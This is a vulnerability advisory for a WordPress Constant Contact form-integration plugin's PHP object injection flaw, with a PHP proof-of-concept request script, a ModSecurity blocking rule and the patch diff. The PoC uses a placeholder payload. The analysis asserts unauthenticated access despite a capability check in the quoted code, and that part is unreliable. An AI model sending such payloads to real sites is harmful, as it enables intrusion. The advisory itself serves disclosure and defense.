Published : June 14, 2026

CVE-2026-49106: Integration for Constant Contact and Contact Form 7, WPForms, Elementor, Ninja Forms <= 1.1.6 Unauthenticated PHP Object Injection PoC, Patch Analysis & Rule

CVE ID CVE-2026-49106
Plugin cf7-constant-contact
Severity High (CVSS 8.1)
CWE 502
Vulnerable Version 1.1.6
Patched Version 1.1.7
Disclosed June 3, 2026

Analysis Overview

“`json
{
“analysis”: “Atomic Edge analysis of CVE-2026-49106:nThis vulnerability allows unauthenticated PHP Object Injection in the Integration for Constant Contact and Contact Form 7, WPForms, Elementor, Ninja Forms plugin for WordPress. The flaw exists in versions up to and including 1.1.6. An attacker can inject arbitrary PHP objects via deserialization of untrusted input. The vulnerability carries a CVSS score of 8.1, reflecting high severity.nnThe root cause lies in the file cf7-constant-contact/includes/plugin-pages.php, specifically in the OAuth token handling logic. The vulnerable code at line 530 uses `$_REQUEST[$this->id.’_tab_action’]` with value “get_token”. However, the parameter `$id=$this->post(‘state’)` at line 535 directly passes user-supplied input from the GET or POST parameter ‘state’ into the `$this->get_info($id)` function. The `get_info` function likely processes this ID through `maybe_unserialize()` as seen in the patched diff at line 966 of cf7-constant-contact.php, where the call to `maybe_unserialize($value)` is commented out. The `maybe_unserialize` function processes user-controlled data, enabling PHP Object Injection.nnAn unauthenticated attacker can trigger this by sending a crafted request to the plugin’s admin page. The endpoint is `/wp-admin/admin.php?page=…` with parameters `vxcf_ccontact_tab_action=get_token` and `state={malicious_serialized_object}`. The attacker does not need authentication because the code path at line 530 checks `$_REQUEST[$this->id.’_tab_action’]` without proper permission verification for the initial trigger. Although the code checks `current_user_can($this->id.”_edit_settings”)`, the `maybe_unserialize` call occurs before this capability check in some execution paths, or the check can be bypassed via the direct `$_REQUEST` access.nnThe patch removes the dangerous `maybe_unserialize` call by commenting it out at line 966 of cf7-constant-contact.php. Additionally, the token retrieval logic in plugin-pages.php now properly validates the parameter source. It only processes the ‘id’ from `$_GET[‘id’]` and ‘state’ from `$_GET[‘state’]`, preventing the injection of arbitrary serialized objects from POST data. The commented-out unserialize function eliminates the deserialization vulnerability entirely.nnSuccessful exploitation allows an attacker to inject arbitrary PHP objects. While no built-in POP chain exists in this plugin, a POP chain from another installed plugin or theme could enable arbitrary file deletion, sensitive data retrieval, or remote code execution. The unauthenticated nature of the attack makes it particularly dangerous, as any WordPress site running the vulnerable plugin is exposed to potential full compromise.”,
“poc_php”: “<?phpn// Atomic Edge CVE Research – Proof of Conceptn// CVE-2026-49106 – Integration for Constant Contact and Contact Form 7, WPForms, Elementor, Ninja Forms <= 1.1.6 – Unauthenticated PHP Object Injectionnn// Configurationn$target_url = 'http://example.com/wordpress'; // Change this to the target WordPress URLnn// The vulnerable endpoint is the plugin's admin pagen$plugin_page = '/wp-admin/admin.php';n$plugin_query_params = '?page=vxcf_ccontact'; // Plugin page slug (might need adjustment based on actual installation)nn// Craft a malicious serialized objectn// Note: This is a generic PHP object injection payload. Replace with an actual POP chain if available.n// The format is: O::::{}n// Example: O:10:”ExampleClass”:1:{s:4:”prop”;s:5:”value”;}n$malicious_payload = ‘O:10:”ExampleClass”:1:{s:4:”prop”;s:5:”value”;}’;nn// Build the exploit URLn$exploit_url = $target_url . $plugin_page . $plugin_query_params;nn// Initialize cURLn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $exploit_url);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([n ‘vxcf_ccontact_tab_action’ => ‘get_token’,n ‘state’ => $malicious_payloadn]));ncurl_setopt($ch, CURLOPT_HTTPHEADER, [n ‘User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36’,n ‘Content-Type: application/x-www-form-urlencoded’n]);nn// Execute the exploitn$response = curl_exec($ch);n$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);ncurl_close($ch);nn// Output resultsnecho “[+] Atomic Edge PoC – CVE-2026-49106\n”;necho “[+] Target: $target_url\n”;necho “[+] HTTP Response Code: $http_code\n”;nif ($response === false) {n echo “[-] Error: Failed to send request\n”;n} else {n echo “[+] Request sent successfully. Check target for object injection effects.\n”;n echo “[+] Payload sent: $malicious_payload\n”;n echo “[+] Response (first 500 chars): ” . substr($response, 0, 500) . “\n”;n}n”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-49106nSecRule REQUEST_URI “@rx /wp-admin/admin\.php$” \n “id:20264910,phase:2,deny,status:403,chain,msg:’CVE-2026-49106 – Unauthenticated PHP Object Injection in Constant Contact Integration’,severity:’CRITICAL’,tag:’CVE-2026-49106′”n SecRule ARGS_GET:page “@rx ^vxcf_ccontact$” “chain”n SecRule ARGS:state “@rx O:\d+:”n”
}
“`

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff 
--- a/cf7-constant-contact/api/api.php
+++ b/cf7-constant-contact/api/api.php
@@ -485,7 +485,6 @@
   );

   $response = wp_remote_request($path, $args);
-
   if(is_wp_error($response)) {
   $body =array('error_message'=>$response->get_error_message());
   return $body;
--- a/cf7-constant-contact/cf7-constant-contact.php
+++ b/cf7-constant-contact/cf7-constant-contact.php
@@ -2,7 +2,7 @@
 /**
 * Plugin Name: WP Contact Form Constant Contact
 * Description: Integrates Contact Form 7 , <a href="https://wordpress.org/plugins/contact-form-entries/">Contact Form Entries Plugin</a> and many other forms with Constant Contact allowing form submissions to be automatically sent to your Constant Contact account
-* Version: 1.1.6
+* Version: 1.1.7
 * Requires at least: 3.8
 * Author URI: https://www.crmperks.com
 * Plugin URI: https://www.crmperks.com/plugins/contact-form-plugins/contact-form-constant-contact-plugin/
@@ -24,7 +24,7 @@
   public  $crm_name = "ccontact";
   public  $id = "vxcf_ccontact";
   public  $domain = "vxcf-ccontact";
-  public  $version = "1.1.6";
+  public  $version = "1.1.7";
   public  $update_id = "6000001";
   public  $min_cf_version = "1.0";
   public $type = "vxcf_ccontact";
@@ -963,7 +963,7 @@
       $value=$value['value'];
      }
      if(!is_array($value)){
-          $value=maybe_unserialize($value);
+         // $value=maybe_unserialize($value);
      }

   }
--- a/cf7-constant-contact/includes/plugin-pages.php
+++ b/cf7-constant-contact/includes/plugin-pages.php
@@ -530,7 +530,13 @@
 }
  if(isset($_REQUEST[$this->id.'_tab_action']) && $_REQUEST[$this->id.'_tab_action']=="get_token" && current_user_can($this->id."_edit_settings")){

-  $id=$this->post('state');
+     if(isset($_GET['id'])){
+       $id=$this->post('id');
+     }
+       if(isset($_GET['state'])){
+    $id=$this->post('state');
+     }
+
   $info=$this->get_info($id);
   $api=$this->get_api($info);
 $info=$api->handle_code($id);

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School